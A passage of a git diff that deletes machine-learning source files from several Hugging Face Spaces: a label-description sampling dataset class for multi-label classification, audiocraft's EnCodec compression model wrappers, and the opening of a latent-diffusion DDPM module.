- def __init__(self, input_dataset, data_args, label_descriptions_file, label_to_id, id_to_label, tokenizer, clsas_descs_len = None, return_desc_embeddings = False, sampleRandom : int = -1, cl_min_positive_descs = 20, useSemSup = True, seen_labels = None, add_label_name = False, max_descs_per_label = 999999, use_precomputed_embeddings = '', bm_short_file = '', ignore_pos_labels_file = '', isTrain = True, class_descs_tokenized = None, choice_indexes = None):
- self.input_dataset = input_dataset
- self.sampleRandom = sampleRandom
- self.cl_min_positive_descs = cl_min_positive_descs
- self.semsup = useSemSup
- self.seen_labels = seen_labels
- self.add_label_name = add_label_name
- self.max_descs_per_label = max_descs_per_label
- self.use_precomputed_embeddings = use_precomputed_embeddings
- self.choice_indexes = choice_indexes
-
- self.bmshortfile = bm_short_file
- self.useBMShort = True if self.bmshortfile!='' else False
- self.data_args = data_args
-
- self.tok_format = 0
- self.isTrain = isTrain
-
- # if data_args.large_dset:
- # Instead of loading the
- self.coil_cluster_map = None
- try:
- if data_args.coil_cluster_mapping_path:
- self.coil_cluster_map = json.load(open(data_args.coil_cluster_mapping_path))
- except:
- print('Failed to load cluster map for some reason')
- self.coil_cluster_map = None
- self.ignore_pos_labels_file = ignore_pos_labels_file
- if self.ignore_pos_labels_file:
- self.ignored_labels = [[y.strip() for y in x.split('\t') if y.strip()!=''] for x in open(self.ignore_pos_labels_file).readlines()]
- else:
- self.ignored_labels = False
-
- if self.useBMShort and not data_args.large_dset:
- self.shortlists = [[y.strip() for y in x.split('\t')] for x in open(self.bmshortfile).readlines()]
-
- if self.semsup and not data_args.large_dset:
- self.data_args = data_args
- self.label_descriptions_file = label_descriptions_file
- self.label_to_id = label_to_id
- self.id_to_label = id_to_label
- if self.seen_labels is not None and isinstance(self.seen_labels[0], str):
- self.seen_labels = np.array([self.label_to_id[x] for x in self.seen_labels])
- self.tokenizer = tokenizer
- if class_descs_len is None:
- js_file = json.load(open(self.label_descriptions_file, encoding = 'utf-8'))
- self.class_descs_len = self.tokenize_class_descs(js_file, return_lengths = True)
- self.class_descs = self.tokenize_class_descs(js_file)
- else:
- self.class_descs_len = class_descs_len
- self.return_desc_embeddings = return_desc_embeddings
-
- self.label_max_seq_length = data_args.label_max_seq_length
- if return_desc_embeddings:
- self.save_tokenized_descs(self.add_label_name)
-
- if self.use_precomputed_embeddings:
- self.computed_desc_inputs_embeds = torch.from_numpy(np.load(self.use_precomputed_embeddings))
- if self.semsup and data_args.large_dset:
- self.data_args = data_args
- self.label_descriptions_file = label_descriptions_file
- self.label_to_id = label_to_id
- self.id_to_label = id_to_label
- # No concept of seen labels over here, directly load the shortlists
- self.tokenizer = tokenizer
- self.return_desc_embeddings = return_desc_embeddings
- self.label_max_seq_length = data_args.label_max_seq_length
-
- to_save = True
- if os.path.exists(data_args.tokenized_descs_file):
- print('Path Exists')
- if data_args.tok_format == 1:
- self.tok_format = 1
- if class_descs_tokenized is not None:
- self.class_descs_tokenized = class_descs_tokenized
- else:
- if data_args.tokenized_descs_file.endswith('h5'):
- self.class_descs_tokenized = h5py.File(data_args.tokenized_descs_file) # np.load(data_args.tokenized_descs_file, allow_pickle=True).item()
- self.tok_format = 1
- else:
- self.class_descs_tokenized = np.load(data_args.tokenized_descs_file, allow_pickle=True)
-
- # TODO: Fix this hardcoding
- # if len(arr) < int(1e6):
- # to_save = True # Possibly Corrupt File
- # # All set, load the file
- # else:
- to_save = False
- js_file = json.load(open(self.label_descriptions_file, encoding = 'utf-8'))
- print('Loaded js File')
- self.class_descs_len = self.tokenize_class_descs(js_file, return_lengths = True)
- if to_save:
- self.class_descs = self.tokenize_class_descs(js_file)
- print('Begin Tokenization Process')
- self.save_tokenized_descs(self.add_label_name)
- print('Saving Tokenized Descriptions')
- import pickle
- pickle.dump(self.class_descs_tokenized, open(data_args.tokenized_descs_file,'wb'))
- print(len(self.class_descs_tokenized))
- 3/0
- file = h5py.File(data_args.tokenized_descs_file,'w')
- for key in tqdm(self.class_descs_tokenized):
- key_h5 = key
- if key.find('/') != -1:
- print('There may be issue with', key)
- key_h5 = key.replace('/','\/')
- file.create_dataset(key_h5+'/'+'input_ids', data = np.array(self.class_descs_tokenized[key]['input_ids']))
- file[key_h5].create_dataset('attention_mask', data = np.array(self.class_descs_tokenized[key]['attention_mask']))
- # else:
- # self.class_descs_tokenized = np.load(data_args.tokenized_descs_file).item()
-
- if isTrain:
- self.shortlists = h5py.File(data_args.train_tfidf_short)['data']
- else:
- print('Testtt File Loaded')
- self.shortlists = h5py.File(data_args.test_tfidf_short)['data']
-
- try:
- del self.class_descs
- except: ...
- if self.tok_format != 1:
- self.class_descs_tokenized = pd.DataFrame({k: [np.array(x) for i, x in enumerate(v.values()) if i != 1] for k,v in self.class_descs_tokenized.items()})
-
- def tokenize_class_descs(self, label_descs, return_lengths = False):
- if return_lengths == 1:
- return {
- label_key: min(descs[0],self.max_descs_per_label) for label_key, descs in label_descs.items()
- } # descs 0 is the length
- else:
- return {
- label_key: descs[1][:self.max_descs_per_label] for label_key, descs in label_descs.items()
- }
-
- def save_tokenized_descs(self, add_label_name = False):
- self.class_descs_tokenized = dict()
- for label_key in tqdm(list(self.class_descs.keys())):
- descs_len = self.class_descs_len[label_key]
- descs = self.class_descs[label_key]
- self.class_descs_tokenized[label_key] = self.tokenizer(
- [label_key + ". " + x for x in descs] if add_label_name else
- descs,
- max_length = self.label_max_seq_length, padding = 'max_length', truncation= True)
- # del self.class_descs_tokenized[label_key]['token_type_ids']
-
- def __len__(self):
- return len(self.input_dataset)
-
-
- def get_item_for_large_dset(self, idx, item):
- if self.choice_indexes is not None:
- idx = int(self.choice_indexes[idx])
- # print(idx)
- shortlists = self.shortlists[idx]
- labels_new = item['label']
-
- if self.sampleRandom != -1:
- if self.sampleRandom < len(shortlists):
- shortlists = np.random.choice(shortlists, self.sampleRandom, replace = False)
- elif self.sampleRandom > len(shortlists):
- # randomly choose from all remaining labels
- shortlists = shortlists.tolist() + [self.label_to_id[x] for x in np.random.choice(self.seen_labels, self.sampleRandom - len(shortlists), replace = False)]
- if self.isTrain:
- pos_labels = np.where(np.array(labels_new) == 1)[0]
- item['all_candidate_labels'] = np.unique(np.concatenate([pos_labels, shortlists]))[:len(shortlists)]
- else:
- item['all_candidate_labels'] = np.unique(shortlists)
- if self.sampleRandom!=-1:
- if len(item['all_candidate_labels']) < self.sampleRandom:
- # Duplicate entries were deleted, manually add some duplicates :)
- item['all_candidate_labels'] = np.concatenate([item['all_candidate_labels'], item['all_candidate_labels'][len(item['all_candidate_labels'])-self.sampleRandom:]])
-
- item['all_candidate_labels'] = item['all_candidate_labels'][:self.sampleRandom]
-
- l1 = len(item['all_candidate_labels'])
- if self.ignored_labels:
- # Remove the ignored labels
- # After removing make sure the size is equal to l1, by randomly duplicating elements
- ignore_list = {self.label_to_id[x] for x in self.ignored_labels}
- if len(ignore_list) > 0:
- item['all_candidate_labels'] = set(item['all_candidate_labels'].tolist()).difference(ignore_list)
- item['all_candidate_labels'] = sorted(list(item['all_candidate_labels']))
-
- if len(item['all_candidate_labels']) < l:
- item['all_candidate_labels'] += item['all_candidate_labels'][:l - len(item['all_candidate_labels'])]
- item['all_candidate_labels'] = np.array(item['all_candidate_labels'])
-
- # l1 = np.array(item['label']).sum()
- item['label'] = np.array(item['label'])[item['all_candidate_labels']]
- # print(f'{item["label"].sum()} / {l1}')
- item['label_desc_ids'] = [np.random.randint(0, self.class_descs_len[self.id_to_label[label_key]]) for label_key in item['all_candidate_labels']]
-
- if self.tok_format ==1:
- item['desc_input_ids'] = [self.class_descs_tokenized['input_ids'][label_key][item['label_desc_ids'][i]].astype(np.int32) for i, label_key in enumerate(item['all_candidate_labels'])]
- item['desc_attention_mask'] = [self.class_descs_tokenized['attention_mask'][label_key][item['label_desc_ids'][i]].astype(np.int32) for i, label_key in enumerate(item['all_candidate_labels'])]
- else:
- item['desc_input_ids'] = [self.class_descs_tokenized[self.id_to_label[label_key]][0][item['label_desc_ids'][i]] for i, label_key in enumerate(item['all_candidate_labels'])]
- item['desc_attention_mask'] = [self.class_descs_tokenized[self.id_to_label[label_key]][1][item['label_desc_ids'][i]] for i, label_key in enumerate(item['all_candidate_labels'])]
- pos_pts = item['label'].nonzero()[0]
- # if len(pos_pts) > 0:
- # print(idx, item['desc_input_ids'][pos_pts[0]])
-
- if self.coil_cluster_map:
- map_to_cluster = lambda x : self.coil_cluster_map[str(x)]
- if isinstance(item['input_ids'], list):
- item['clustered_input_ids'] = [self.coil_cluster_map[str(x)] for x in item['input_ids']]
- else:
- item['clustered_input_ids'] = item['input_ids'].vectorize(map_to_cluster)
- item['clustered_desc_ids'] = [[self.coil_cluster_map[str(x)] for x in xx] for xx in item['desc_input_ids']]
-
- return item
-
- def __getitem__(self, idx):
- item = self.input_dataset.__getitem__(idx)
- if self.data_args.large_dset:
- return self.get_item_for_large_dset(idx, item)
-
-
- # Iterate over all the labels of input_dataset
- # and add random label_description to the item in the same order
- if self.ignored_labels:
- ignored_labels = self.ignored_labels[idx]
- if self.sampleRandom != -1:
- # Create all_candidate_labels
- if self.seen_labels is None:
- labels_new = item['label']
- else:
- labels_new = np.array(item['label'])[self.seen_labels]
-
- if self.useBMShort:
- # Instead of choosing randomly, choose 60% topmost most from the shortlist
- # Next sample the remaining random entries
- if self.seen_labels is not None:
- # from pdb import set_trace as bp
- # bp()
- all_candidate_labels = [self.seen_labels.tolist().index(self.label_to_id[x]) for x in self.shortlists[idx] if self.label_to_id[x] in self.seen_labels][:int(0.8*self.sampleRandom)]
- # print(f'BM got: {len(all_candidate_labels)}')
- # Choose the remaining randomly from set of seen_labels - all_candidates
- all_candidate_labels += np.random.choice(list({x for x in range(len(self.seen_labels))}.difference(set(all_candidate_labels))), self.sampleRandom - len(all_candidate_labels), replace = False).tolist()
- else:
- all_candidate_labels = np.random.choice(range(len(labels_new)) , self.sampleRandom , replace = False)
- # prepend positive labels
- pos_labels = np.where(np.array(labels_new) == 1)[0]
- all_candidate_labels = np.concatenate([pos_labels, all_candidate_labels])
- # Remove duplicates
- all_candidate_labels = np.unique(all_candidate_labels)[:self.sampleRandom]
- if len(pos_labels) < self.cl_min_positive_descs:
- addn_pos_labels = np.random.choice(pos_labels, self.cl_min_positive_descs - len(pos_labels))
- all_candidate_labels = np.concatenate([addn_pos_labels, all_candidate_labels])[:self.sampleRandom]
- np.random.shuffle(all_candidate_labels)
- item['all_candidate_labels'] = all_candidate_labels
- # NOTE: ids will be according to seen labels
- # Now update the labels based on all_candidate_labels
-
- # print('Getting Data')
- if self.semsup:
- # print(len(item['label']))
- if 'all_candidate_labels' not in item:
- item['label_desc_ids'] = [np.random.randint(0, self.class_descs_len[self.id_to_label[label_key]]) for label_key in range(len(item['label']))]
- if self.return_desc_embeddings:
- item['desc_input_ids'] = [self.class_descs_tokenized[self.id_to_label[label_key]][0][item['label_desc_ids'][label_key]] for label_key in range(len(item['label']))]
- item['desc_attention_mask'] = [self.class_descs_tokenized[self.id_to_label[label_key]][1][item['label_desc_ids'][label_key]] for label_key in range(len(item['label']))]
- if self.use_precomputed_embeddings:
- new_indices = [i*5 + x for i,x in enumerate(item['label_desc_ids'])]
- # item['desc_inputs_embeds'] = [self.computed_desc_inputs_embeds[ item['label_desc_ids'][label_key], self.label_to_id[self.id_to_label[label_key]] ] for label_key in range(len(item['label']))]
- # item['desc_inputs_embeds'] = self.computed_desc_inputs_embeds[ item['label_desc_ids'][label_key], self.label_to_id[self.id_to_label[label_key]] for label_key in range(len(item['label']))]
- if self.seen_labels is not None:
- new_indices = [x for i, x in enumerate(new_indices) if i in self.seen_labels]
- item['desc_inputs_embeds'] = self.computed_desc_inputs_embeds[new_indices]
-
- item['all_candidate_labels'] = range(len(item['label']))
-
- if self.seen_labels is not None:
- item['label_desc_ids'] = (np.array(item['label_desc_ids'])[self.seen_labels]).tolist()
- if self.return_desc_embeddings:
- item['desc_input_ids'] = (np.array(item['desc_input_ids']))[self.seen_labels].tolist()
- item['desc_attention_mask'] = (np.array(item['desc_attention_mask']))[self.seen_labels].tolist()
- # if self.use_precomputed_embeddings:
- # item['desc_inputs_embeds'] = torch.tensor(item['desc_inputs_embeds'])[self.seen_labels]
-
- item['all_candidate_labels'] = (np.array(item['all_candidate_labels']))[self.seen_labels].tolist()
- item['label'] = (np.array(item['label']))[self.seen_labels].tolist()
- elif 'all_candidate_labels' in item:
- # print('Computing')
- st = time.time()
- item['label_desc_ids'] = [np.random.randint(0, self.class_descs_len[self.id_to_label[label_key]]) for label_key in range(len(item['label']))]
- if self.seen_labels is not None:
- if self.return_desc_embeddings:
- item['desc_input_ids'] = [self.class_descs_tokenized[self.id_to_label[label_key]][0][item['label_desc_ids'][label_key]] for label_key in range(len(item['label']))]
- item['desc_attention_mask'] = [self.class_descs_tokenized[self.id_to_label[label_key]][1][item['label_desc_ids'][label_key]] for label_key in range(len(item['label']))]
- if self.use_precomputed_embeddings:
- new_indices = [i*5 + x for i,x in enumerate(item['label_desc_ids'])]
- # Now of the 4271 labels, chose only the seen labels
- new_indices = [x for i, x in enumerate(new_indices) if i in self.seen_labels]
- # Now choose all_candidate labels
- # print(len(new_indices))
- new_indices = [new_indices[x] for x in sorted(item['all_candidate_labels'])]
- # print(len(new_indices), len(item['all_candidate_labels']))
- # if len(new_indices)!=1500:
- # print('Some Issue Over Here')
- item['desc_inputs_embeds'] = self.computed_desc_inputs_embeds[new_indices]
- # [self.computed_desc_inputs_embeds[ item['label_desc_ids'][label_key], self.label_to_id[self.id_to_label[label_key]] ] for label_key in range(len(item['label']))]
- # print('Mid Calculation Done', item['desc_inputs_embeds'].shape, time.time() - st)
- item['label_desc_ids'] = np.array(item['label_desc_ids'])[self.seen_labels].tolist()
- item['label'] = np.array(item['label'])[self.seen_labels].tolist()
- item['label'] = np.array(item['label'])[all_candidate_labels].tolist()
- item['desc_input_ids'] = np.array(item['desc_input_ids'])[self.seen_labels][item['all_candidate_labels']].tolist()
- item['desc_attention_mask'] = np.array(item['desc_attention_mask'])[self.seen_labels][item['all_candidate_labels']].tolist()
- # if self.use_precomputed_embeddings:
- # print('Starting Final Compute', time.time() - st)
- # item['desc_inputs_embeds'] = item['desc_inputs_embeds'][self.seen_labels][item['all_candidate_labels']]#.tolist()
- # print('Computed', type(item['desc_inputs_embeds']), type(item['desc_inputs_embeds'][0]), time.time() - st)
- else:
- item['label'] = np.array(item['label'])[all_candidate_labels].tolist()
- if self.return_desc_embeddings:
- item['desc_input_ids'] = [self.class_descs_tokenized[self.id_to_label[label_key]][0][item['label_desc_ids'][label_key]] for label_key in np.array(item['all_candidate_labels'])]
- item['desc_attention_mask'] = [self.class_descs_tokenized[self.id_to_label[label_key]][1][item['label_desc_ids'][label_key]] for label_key in np.array(item['all_candidate_labels'])]
- if self.use_precomputed_embeddings:
- item['desc_inputs_embeds'] = [self.computed_desc_inputs_embeds[ item['label_desc_ids'][label_key], self.label_to_id[self.id_to_label[label_key]] ] for label_key in np.array(item['all_candidate_labels'])]
-
- if self.ignored_labels:
- if self.sampleRandom != -1 and self.seen_labels is not None:
- ignored_labels = [self.seen_labels.tolist().index(self.label_to_id[x]) for x in self.ignored_labels[idx]]
- item['all_candidate_labels'] = item['all_candidate_labels'].tolist()
- else:
- ignored_labels = [self.label_to_id[x] for x in self.ignored_labels[idx]]
- remove_pts = [item['all_candidate_labels'].index(x) for x in ignored_labels if x in item['all_candidate_labels']]
- keep_pts = [x for x in range(len(item['all_candidate_labels'])) if x not in remove_pts]
- # Keep pts can be less than sampleRandom. Manually pad after choosing some values
- # print('Before Len', len(keep_pts), len(item['desc_input_ids']))
- if self.sampleRandom!=-1 and len(keep_pts) < self.sampleRandom:
- # print('Inside the choice function')
- keep_pts += np.random.choice(keep_pts, self.sampleRandom - len(keep_pts), replace = False).tolist()
- # print('After Len', len(keep_pts), len(item['desc_input_ids']))
-
- # print(len(keep_pts), max(keep_pts))
- item['desc_input_ids'] = np.array(item['desc_input_ids'])[keep_pts].tolist()
- item['desc_attention_mask'] = np.array(item['desc_attention_mask'])[keep_pts].tolist()
- if 'desc_inputs_embeds' in item:
- item['desc_inputs_embeds'] = np.array(item['desc_inputs_embeds'])[keep_pts].tolist()
- item['label_desc_ids'] = np.array(item['label_desc_ids'])[keep_pts].tolist()
- item['label'] = np.array(item['label'])[keep_pts].tolist()
-
- if self.coil_cluster_map:
- map_to_cluster = lambda x : self.coil_cluster_map[str(x)]
- if isinstance(item['input_ids'], list):
- item['clustered_input_ids'] = [self.coil_cluster_map[str(x)] for x in item['input_ids']]
- else:
- item['clustered_input_ids'] = item['input_ids'].vectorize(map_to_cluster)
- item['clustered_desc_ids'] = [[self.coil_cluster_map[str(x)] for x in xx] for xx in item['desc_input_ids']]
- return item
-
-
- else:
- return item
-
-
diff --git a/spaces/Prof-Reza/Audiocraft_Music-Audio_Generation/audiocraft/models/encodec.py b/spaces/Prof-Reza/Audiocraft_Music-Audio_Generation/audiocraft/models/encodec.py
deleted file mode 100644
index 1cf6b54b582975a01bdb7a06280c766d3d2cc72c..0000000000000000000000000000000000000000
--- a/spaces/Prof-Reza/Audiocraft_Music-Audio_Generation/audiocraft/models/encodec.py
+++ /dev/null
@@ -1,392 +0,0 @@
-# Copyright (c) Meta Platforms, Inc. and affiliates.
-# All rights reserved.
-#
-# This source code is licensed under the license found in the
-# LICENSE file in the root directory of this source tree.
-"""Compression models or wrapper around existing models.
-Also defines the main interface that a model must follow to be usable as an audio tokenizer.
-"""
-
-from abc import ABC, abstractmethod
-import logging
-import math
-from pathlib import Path
-import typing as tp
-
-import numpy as np
-import torch
-from torch import nn
-from transformers import EncodecModel as HFEncodecModel
-
-from .. import quantization as qt
-
-
-logger = logging.getLogger()
-
-
-class CompressionModel(ABC, nn.Module):
- """Base API for all compression model that aim at being used as audio tokenizers
- with a language model.
- """
-
- @abstractmethod
- def forward(self, x: torch.Tensor) -> qt.QuantizedResult:
- ...
-
- @abstractmethod
- def encode(self, x: torch.Tensor) -> tp.Tuple[torch.Tensor, tp.Optional[torch.Tensor]]:
- """See `EncodecModel.encode`."""
- ...
-
- @abstractmethod
- def decode(self, codes: torch.Tensor, scale: tp.Optional[torch.Tensor] = None):
- """See `EncodecModel.decode`."""
- ...
-
- @abstractmethod
- def decode_latent(self, codes: torch.Tensor):
- """Decode from the discrete codes to continuous latent space."""
- ...
-
- @property
- @abstractmethod
- def channels(self) -> int:
- ...
-
- @property
- @abstractmethod
- def frame_rate(self) -> float:
- ...
-
- @property
- @abstractmethod
- def sample_rate(self) -> int:
- ...
-
- @property
- @abstractmethod
- def cardinality(self) -> int:
- ...
-
- @property
- @abstractmethod
- def num_codebooks(self) -> int:
- ...
-
- @property
- @abstractmethod
- def total_codebooks(self) -> int:
- ...
-
- @abstractmethod
- def set_num_codebooks(self, n: int):
- """Set the active number of codebooks used by the quantizer."""
- ...
-
- @staticmethod
- def get_pretrained(
- name: str, device: tp.Union[torch.device, str] = 'cpu'
- ) -> 'CompressionModel':
- """Instantiate a CompressionModel from a given pretrained model.
-
- Args:
- name (Path or str): name of the pretrained model. See after.
- device (torch.device or str): Device on which the model is loaded.
-
- Pretrained models:
- - dac_44khz (https://github.com/descriptinc/descript-audio-codec)
- - dac_24khz (same)
- - facebook/encodec_24khz (https://huggingface.co/facebook/encodec_24khz)
- - facebook/encodec_32khz (https://huggingface.co/facebook/encodec_32khz)
- - your own model on HugginFace. Export instructions to come...
- """
-
- from . import builders, loaders
- model: CompressionModel
- if name in ['dac_44khz', 'dac_24khz']:
- model_type = name.split('_')[1]
- logger.info("Getting pretrained compression model from DAC %s", model_type)
- model = DAC(model_type)
- elif name in ['debug_compression_model']:
- logger.info("Getting pretrained compression model for debug")
- model = builders.get_debug_compression_model()
- elif Path(name).exists():
- # We assume here if the paths exist that it is in fact an AC checkpoint
- # that was exported using `audiocraft.utils.export` functions.
- model = loaders.load_compression_model(name, device=device)
- else:
- logger.info("Getting pretrained compression model from HF %s", name)
- hf_model = HFEncodecModel.from_pretrained(name)
- model = HFEncodecCompressionModel(hf_model).to(device)
- return model.to(device).eval()
-
-
-class EncodecModel(CompressionModel):
- """Encodec model operating on the raw waveform.
-
- Args:
- encoder (nn.Module): Encoder network.
- decoder (nn.Module): Decoder network.
- quantizer (qt.BaseQuantizer): Quantizer network.
- frame_rate (int): Frame rate for the latent representation.
- sample_rate (int): Audio sample rate.
- channels (int): Number of audio channels.
- causal (bool): Whether to use a causal version of the model.
- renormalize (bool): Whether to renormalize the audio before running the model.
- """
- # we need assignment to override the property in the abstract class,
- # I couldn't find a better way...
- frame_rate: float = 0
- sample_rate: int = 0
- channels: int = 0
-
- def __init__(self,
- encoder: nn.Module,
- decoder: nn.Module,
- quantizer: qt.BaseQuantizer,
- frame_rate: int,
- sample_rate: int,
- channels: int,
- causal: bool = False,
- renormalize: bool = False):
- super().__init__()
- self.encoder = encoder
- self.decoder = decoder
- self.quantizer = quantizer
- self.frame_rate = frame_rate
- self.sample_rate = sample_rate
- self.channels = channels
- self.renormalize = renormalize
- self.causal = causal
- if self.causal:
- # we force disabling here to avoid handling linear overlap of segments
- # as supported in original EnCodec codebase.
- assert not self.renormalize, 'Causal model does not support renormalize'
-
- @property
- def total_codebooks(self):
- """Total number of quantizer codebooks available."""
- return self.quantizer.total_codebooks
-
- @property
- def num_codebooks(self):
- """Active number of codebooks used by the quantizer."""
- return self.quantizer.num_codebooks
-
- def set_num_codebooks(self, n: int):
- """Set the active number of codebooks used by the quantizer."""
- self.quantizer.set_num_codebooks(n)
-
- @property
- def cardinality(self):
- """Cardinality of each codebook."""
- return self.quantizer.bins
-
- def preprocess(self, x: torch.Tensor) -> tp.Tuple[torch.Tensor, tp.Optional[torch.Tensor]]:
- scale: tp.Optional[torch.Tensor]
- if self.renormalize:
- mono = x.mean(dim=1, keepdim=True)
- volume = mono.pow(2).mean(dim=2, keepdim=True).sqrt()
- scale = 1e-8 + volume
- x = x / scale
- scale = scale.view(-1, 1)
- else:
- scale = None
- return x, scale
-
- def postprocess(self,
- x: torch.Tensor,
- scale: tp.Optional[torch.Tensor] = None) -> torch.Tensor:
- if scale is not None:
- assert self.renormalize
- x = x * scale.view(-1, 1, 1)
- return x
-
- def forward(self, x: torch.Tensor) -> qt.QuantizedResult:
- assert x.dim() == 3
- length = x.shape[-1]
- x, scale = self.preprocess(x)
-
- emb = self.encoder(x)
- q_res = self.quantizer(emb, self.frame_rate)
- out = self.decoder(q_res.x)
-
- # remove extra padding added by the encoder and decoder
- assert out.shape[-1] >= length, (out.shape[-1], length)
- out = out[..., :length]
-
- q_res.x = self.postprocess(out, scale)
-
- return q_res
-
- def encode(self, x: torch.Tensor) -> tp.Tuple[torch.Tensor, tp.Optional[torch.Tensor]]:
- """Encode the given input tensor to quantized representation along with scale parameter.
-
- Args:
- x (torch.Tensor): Float tensor of shape [B, C, T]
-
- Returns:
- codes, scale (tuple of torch.Tensor, torch.Tensor): Tuple composed of:
- codes a float tensor of shape [B, K, T] with K the number of codebooks used and T the timestep.
- scale a float tensor containing the scale for audio renormalizealization.
- """
- assert x.dim() == 3
- x, scale = self.preprocess(x)
- emb = self.encoder(x)
- codes = self.quantizer.encode(emb)
- return codes, scale
-
- def decode(self, codes: torch.Tensor, scale: tp.Optional[torch.Tensor] = None):
- """Decode the given codes to a reconstructed representation, using the scale to perform
- audio denormalization if needed.
-
- Args:
- codes (torch.Tensor): Int tensor of shape [B, K, T]
- scale (torch.Tensor, optional): Float tensor containing the scale value.
-
- Returns:
- out (torch.Tensor): Float tensor of shape [B, C, T], the reconstructed audio.
- """
- emb = self.decode_latent(codes)
- out = self.decoder(emb)
- out = self.postprocess(out, scale)
- # out contains extra padding added by the encoder and decoder
- return out
-
- def decode_latent(self, codes: torch.Tensor):
- """Decode from the discrete codes to continuous latent space."""
- return self.quantizer.decode(codes)
-
-
-class DAC(CompressionModel):
- def __init__(self, model_type: str = "44khz"):
- super().__init__()
- try:
- import dac.utils
- except ImportError:
- raise RuntimeError("Could not import dac, make sure it is installed, "
- "please run `pip install descript-audio-codec`")
- self.model = dac.utils.load_model(model_type=model_type)
- self.n_quantizers = self.total_codebooks
-
- def forward(self, x: torch.Tensor) -> qt.QuantizedResult:
- # We don't support training with this.
- raise NotImplementedError("Forward and training with DAC not supported.")
-
- def encode(self, x: torch.Tensor) -> tp.Tuple[torch.Tensor, tp.Optional[torch.Tensor]]:
- codes = self.model.encode(x, self.n_quantizers)[1]
- return codes, None
-
- def decode(self, codes: torch.Tensor, scale: tp.Optional[torch.Tensor] = None):
- assert scale is None
- z_q = self.decode_latent(codes)
- return self.model.decode(z_q)
-
- def decode_latent(self, codes: torch.Tensor):
- """Decode from the discrete codes to continuous latent space."""
- return self.model.quantizer.from_codes(codes)[0]
-
- @property
- def channels(self) -> int:
- return 1
-
- @property
- def frame_rate(self) -> float:
- return self.model.sample_rate / self.model.hop_length
-
- @property
- def sample_rate(self) -> int:
- return self.model.sample_rate
-
- @property
- def cardinality(self) -> int:
- return self.model.codebook_size
-
- @property
- def num_codebooks(self) -> int:
- return self.n_quantizers
-
- @property
- def total_codebooks(self) -> int:
- return self.model.n_codebooks
-
- def set_num_codebooks(self, n: int):
- """Set the active number of codebooks used by the quantizer.
- """
- assert n >= 1
- assert n <= self.total_codebooks
- self.n_quantizers = n
-
-
-class HFEncodecCompressionModel(CompressionModel):
- """Wrapper around HuggingFace Encodec.
- """
- def __init__(self, model: HFEncodecModel):
- super().__init__()
- self.model = model
- bws = self.model.config.target_bandwidths
- num_codebooks = [
- bw * 1000 / (self.frame_rate * math.log2(self.cardinality))
- for bw in bws
- ]
- deltas = [nc - int(nc) for nc in num_codebooks]
- # Checking we didn't do some bad maths and we indeed have integers!
- assert all(deltas) <= 1e-3, deltas
- self.possible_num_codebooks = [int(nc) for nc in num_codebooks]
- self.set_num_codebooks(max(self.possible_num_codebooks))
-
- def forward(self, x: torch.Tensor) -> qt.QuantizedResult:
- # We don't support training with this.
- raise NotImplementedError("Forward and training with HF EncodecModel not supported.")
-
- def encode(self, x: torch.Tensor) -> tp.Tuple[torch.Tensor, tp.Optional[torch.Tensor]]:
- bandwidth_index = self.possible_num_codebooks.index(self.num_codebooks)
- bandwidth = self.model.config.target_bandwidths[bandwidth_index]
- res = self.model.encode(x, None, bandwidth)
- assert len(res[0]) == 1
- assert len(res[1]) == 1
- return res[0][0], res[1][0]
-
- def decode(self, codes: torch.Tensor, scale: tp.Optional[torch.Tensor] = None):
- if scale is None:
- scales = [None] # type: ignore
- else:
- scales = scale # type: ignore
- res = self.model.decode(codes[None], scales)
- return res[0]
-
- def decode_latent(self, codes: torch.Tensor):
- """Decode from the discrete codes to continuous latent space."""
- return self.model.quantizer.decode(codes.transpose(0, 1))
-
- @property
- def channels(self) -> int:
- return self.model.config.audio_channels
-
- @property
- def frame_rate(self) -> float:
- hop_length = int(np.prod(self.model.config.upsampling_ratios))
- return self.sample_rate / hop_length
-
- @property
- def sample_rate(self) -> int:
- return self.model.config.sampling_rate
-
- @property
- def cardinality(self) -> int:
- return self.model.config.codebook_size
-
- @property
- def num_codebooks(self) -> int:
- return self._num_codebooks
-
- @property
- def total_codebooks(self) -> int:
- return max(self.possible_num_codebooks)
-
- def set_num_codebooks(self, n: int):
- """Set the active number of codebooks used by the quantizer.
- """
- if n not in self.possible_num_codebooks:
- raise ValueError(f"Allowed values for num codebooks: {self.possible_num_codebooks}")
- self._num_codebooks = n
diff --git a/spaces/Purple11/Grounded-Diffusion/ldm/models/diffusion/plms.py b/spaces/Purple11/Grounded-Diffusion/ldm/models/diffusion/plms.py
deleted file mode 100644
index c7bdbf2bdbe0ff4a415ffbf406b97922b5931a90..0000000000000000000000000000000000000000
--- a/spaces/Purple11/Grounded-Diffusion/ldm/models/diffusion/plms.py
+++ /dev/null
@@ -1,1448 +0,0 @@
-"""
-wild mixture of
-https://github.com/lucidrains/denoising-diffusion-pytorch/blob/7706bdfc6f527f58d33f84b7b522e61e6e3164b3/denoising_diffusion_pytorch/denoising_diffusion_pytorch.py
-https://github.com/openai/improved-diffusion/blob/e94489283bb876ac1477d5dd7709bbbd2d9902ce/improved_diffusion/gaussian_diffusion.py
-https://github.com/CompVis/taming-transformers
--- merci
-"""
-
-import torch
-import torch.nn as nn
-import numpy as np
-import pytorch_lightning as pl
-from torch.optim.lr_scheduler import LambdaLR
-from einops import rearrange, repeat
-from contextlib import contextmanager
-from functools import partial
-from tqdm import tqdm
-from torchvision.utils import make_grid
-from pytorch_lightning.utilities.distributed import rank_zero_only
-
-from ldm.util import log_txt_as_img, exists, default, ismap, isimage, mean_flat, count_params, instantiate_from_config
-from ldm.modules.ema import LitEma
-from ldm.modules.distributions.distributions import normal_kl, DiagonalGaussianDistribution
-from ldm.models.autoencoder import VQModelInterface, IdentityFirstStage, AutoencoderKL
-from ldm.modules.diffusionmodules.util import make_beta_schedule, extract_into_tensor, noise_like
-from ldm.models.diffusion.ddim import DDIMSampler
-
-
-__conditioning_keys__ = {'concat': 'c_concat',
- 'crossattn': 'c_crossattn',
- 'adm': 'y'}
-
-
-def disabled_train(self, mode=True):
- """Overwrite model.train with this function to make sure train/eval mode
- does not change anymore."""
- return self
-
-
-def uniform_on_device(r1, r2, shape, device):
- return (r1 - r2) * torch.rand(*shape, device=device) + r2
-
-
-class DDPM(pl.LightningModule):
- # classic DDPM with Gaussian diffusion, in image space
- def __init__(self,
- unet_config,
- timesteps=1000,
- beta_schedule="linear",
- loss_type="l2",
- ckpt_path=None,
- ignore_keys=[],
- load_only_unet=False,
- monitor="val/loss",
- use_ema=True,
- first_stage_key="image",
- image_size=256,
- channels=3,
- log_every_t=100,
- clip_denoised=True,
- linear_start=1e-4,
- linear_end=2e-2,
- cosine_s=8e-3,
